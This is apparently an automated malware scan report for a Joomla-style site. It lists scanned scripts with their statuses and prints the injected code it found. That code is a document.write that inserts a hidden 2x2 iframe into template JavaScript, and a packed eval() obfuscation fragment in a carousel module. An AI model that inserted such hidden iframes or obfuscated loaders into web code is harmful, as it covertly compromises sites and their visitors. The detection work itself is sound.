Scanned pages/files
Request | Server response | Status |
http://www.ivanhome.biz/ | 200 OK Content-Length: 43349 Content-Type: text/html | clean |
http://www.ivanhome.biz/plugins/system/jcemediabox/js/mediaobject.js?v=105 | 200 OK Content-Length: 2981 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.ivanhome.biz/plugins/system/jcemediabox/js/jcemediabox.js?v=105 | 200 OK Content-Length: 40872 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.ivanhome.biz/plugins/system/jcemediabox/addons/default.js?v=105 | 200 OK Content-Length: 1560 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.ivanhome.biz/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: text/javascript | clean |
http://www.ivanhome.biz/templates/it021/lib/js/addons/base.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://www.ivanhome.biz/test404page.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://www.ivanhome.biz/templates/it021/lib/js/addons/accordionmenu.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://www.ivanhome.biz/templates/it021/lib/js/addons/fancymenu.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://www.ivanhome.biz/templates/it021/lib/js/addons/dropdownmenu.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://www.ivanhome.biz/templates/it021/lib/js/template.js | 200 OK Content-Length: 4154 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var YOOTemplate = {
start: function() { YOOTemplate.matchHeights(); new YOOAccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' }); var dropdown = new YOODropdownMenu('menu', { mode: 'slide', dropdownSelector: 'div.dropdown', transition: Fx.Transitions.Expo.easeOut }); var hoverColorMenu; var leaveColorMenu; var hoverColorSubmenu; var leaveColor1 YOOBase.matchHeight('div.maintopbox div.deepest', 20); YOOBase.matchHeight('div.mainbottombox div.deepest', 20); YOOBase.matchHeight('div.contenttopbox div.deepest', 20); YOOBase.matchHeight('div.contentbottombox div.deepest', 20); } }; window.addEvent('domready', YOOTemplate.start); document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.ivanhome.biz/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 2873 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('C I=h n({1r:5(d,3){2.o({1b:n.t,Y:n.t,1l:n.t,11:n.t,10:\'.s\',13:\'.1g\',17:\'.a\',16:\'.a-6\',Z:\'.a-1s\',X:1q,1j:1t,z:\'x\',K:0,D:\'1u\',N:\'1v\',M:\'19\',k:1p,9:\ document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12498 Content-Type: application/javascript | clean |
http://settings.messenger.live.com/controls/1.0/PresenceButton.js | 500 Can't connect to settings.messenger.live.com:80 (Bad hostname) Content-Length: 186 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ivanhome.biz
Result:
GET / HTTP/1.1
Host: ivanhome.biz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ivanhome.biz
Referer: http://www.google.com/search?q=ivanhome.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ivanhome.biz
Referer: http://www.google.com/search?q=ivanhome.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ivanhome.biz
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ivanhome.biz/
Result: ivanhome.biz is not infected or malware details are not published yet.
Result: ivanhome.biz is not infected or malware details are not published yet.